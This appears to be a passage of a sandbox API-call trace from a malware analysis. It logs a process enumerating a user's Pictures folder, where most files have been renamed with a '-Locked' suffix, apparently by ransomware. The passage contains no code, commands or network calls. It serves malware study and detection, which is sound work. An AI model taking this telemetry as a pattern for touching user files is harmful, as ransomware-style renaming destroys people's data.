FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35484fe0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35484fe0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35484fe0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0VXzeqDCRdwWVtEOwAjX.bmp-Locked", cAlternateFileName="0VXZEQ~2.BMP")) returned 1 [0305.985] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x354c47cb, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x354c47cb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x354c47cb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1a-5T7.png-Locked", cAlternateFileName="1A-5T7~1.PNG")) returned 1 [0305.986] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35513770, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35513770, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35513770, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1rEhjaUCQFs c9JBp.jpg-Locked", cAlternateFileName="1REHJA~2.JPG")) returned 1 [0305.986] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35540ac5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35540ac5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35540ac5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3Cpzt7PCzTidXfHRDLk.png-Locked", cAlternateFileName="3CPZT7~2.PNG")) returned 1 [0305.986] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x355e7e6c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x355e7e6c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x355e7e6c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="7krBdWYoZTKAhW.gif-Locked", cAlternateFileName="7KRBDW~2.GIF")) returned 1 [0305.987] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x35af0875, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35af0875, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0305.987] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3563124f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3563124f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3563124f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cWtM6sPompJDNhYi.bmp-Locked", cAlternateFileName="CWTM6S~2.BMP")) returned 1 [0305.987] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35652121, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35652121, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35652121, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.987] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35671cdb, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35671cdb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35671cdb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="f-BdV5SdU0Bq6dRLimk5.bmp-Locked", cAlternateFileName="F-BDV5~2.BMP")) returned 1 [0305.987] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35697ac7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35697ac7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35697ac7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JBjtDOPdC.jpg-Locked", cAlternateFileName="JBJTDO~2.JPG")) returned 1 [0305.988] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x357610da, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x357610da, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x357610da, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ju9W4N8R3NHzR1k.png-Locked", cAlternateFileName="JU9W4N~2.PNG")) returned 1 [0305.988] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35796c1f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35796c1f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35796c1f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONjt5so8gB0htr9SLu.jpg-Locked", cAlternateFileName="ONJT5S~2.JPG")) returned 1 [0305.988] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35833046, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35833046, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35833046, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ovrZpwsZ9oIx2.png-Locked", cAlternateFileName="OVRZPW~2.PNG")) returned 1 [0305.988] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35891147, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35891147, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35891147, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QNrRte.png-Locked", cAlternateFileName="QNRRTE~1.PNG")) returned 1 [0305.989] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0305.989] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359713fd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x359713fd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x359713fd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="soGL3VvH3.jpg-Locked", cAlternateFileName="SOGL3V~2.JPG")) returned 1 [0305.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3598d596, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3598d596, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3598d596, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tQi0H8EC.jpg-Locked", cAlternateFileName="TQI0H8~1.JPG")) returned 1 [0305.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359a6ea3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x359a6ea3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x359a6ea3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="u6iPBC1t5.gif-Locked", cAlternateFileName="U6IPBC~2.GIF")) returned 1 [0305.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359d2eb7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x359d2eb7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x359d2eb7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uy1att05vGLsri.png-Locked", cAlternateFileName="UY1ATT~2.PNG")) returned 1 [0305.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa04425a0, ftCreationTime.dwHighDateTime=0x1d7dd03, ftLastAccessTime.dwLowDateTime=0x2963dc60, ftLastAccessTime.dwHighDateTime=0x1d7e1cb, ftLastWriteTime.dwLowDateTime=0x2963dc60, ftLastWriteTime.dwHighDateTime=0x1d7e1cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vtWu-", cAlternateFileName="")) returned 1 [0305.991] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359f16f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x359f16f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x359f16f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VVbwcj.jpg-Locked", cAlternateFileName="VVBWCJ~1.JPG")) returned 1 [0305.991] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a4e333, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35a4e333, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35a4e333, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="X0o USyk.gif-Locked", cAlternateFileName="X0OUSY~2.GIF")) returned 1 [0305.991] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a72c7c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35a72c7c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35a72c7c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="xDBEu.png-Locked", cAlternateFileName="XDBEU~1.PNG")) returned 1 [0305.991] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ab721f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35ab721f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35ab721f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YSfbkFfVqb.jpg-Locked", cAlternateFileName="YSFBKF~2.JPG")) returned 1 [0305.992] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0305.992] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.992] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures", lpFilePart=0x0) returned 0x1e [0305.992] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpFilePart=0x0) returned 0x1f [0305.993] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35ad4761, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35ad4761, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.993] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35ad4761, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35ad4761, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.993] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x353db434, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x353db434, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x353db434, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yrCaSxSlfeUmFUe0U.bmp-Locked", cAlternateFileName="-YRCAS~2.BMP")) returned 1 [0305.994] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35484fe0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35484fe0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35484fe0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0VXzeqDCRdwWVtEOwAjX.bmp-Locked", cAlternateFileName="0VXZEQ~2.BMP")) returned 1 [0305.994] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x354c47cb, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x354c47cb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x354c47cb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1a-5T7.png-Locked", cAlternateFileName="1A-5T7~1.PNG")) returned 1 [0305.994] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35513770, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35513770, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35513770, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1rEhjaUCQFs c9JBp.jpg-Locked", cAlternateFileName="1REHJA~2.JPG")) returned 1 [0305.994] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35540ac5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35540ac5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35540ac5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3Cpzt7PCzTidXfHRDLk.png-Locked", cAlternateFileName="3CPZT7~2.PNG")) returned 1 [0305.995] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x355e7e6c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x355e7e6c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x355e7e6c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="7krBdWYoZTKAhW.gif-Locked", cAlternateFileName="7KRBDW~2.GIF")) returned 1 [0305.995] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x35af0875, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35af0875, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0305.995] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3563124f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3563124f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3563124f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cWtM6sPompJDNhYi.bmp-Locked", cAlternateFileName="CWTM6S~2.BMP")) returned 1 [0305.995] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35652121, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35652121, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35652121, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.996] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35671cdb, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35671cdb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35671cdb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="f-BdV5SdU0Bq6dRLimk5.bmp-Locked", cAlternateFileName="F-BDV5~2.BMP")) returned 1 [0305.996] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35697ac7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35697ac7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35697ac7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JBjtDOPdC.jpg-Locked", cAlternateFileName="JBJTDO~2.JPG")) returned 1 [0305.996] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x357610da, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x357610da, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x357610da, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ju9W4N8R3NHzR1k.png-Locked", cAlternateFileName="JU9W4N~2.PNG")) returned 1 [0306.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35796c1f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35796c1f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35796c1f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONjt5so8gB0htr9SLu.jpg-Locked", cAlternateFileName="ONJT5S~2.JPG")) returned 1 [0306.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35833046, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35833046, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35833046, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ovrZpwsZ9oIx2.png-Locked", cAlternateFileName="OVRZPW~2.PNG")) returned 1 [0306.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35891147, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35891147, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35891147, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QNrRte.png-Locked", cAlternateFileName="QNRRTE~1.PNG")) returned 1 [0306.002] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0306.003] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359713fd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x359713fd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x359713fd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="soGL3VvH3.jpg-Locked", cAlternateFileName="SOGL3V~2.JPG")) returned 1 [0306.003] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3598d596, ftCreationTime.dwHighDateTime=0x1d82250, 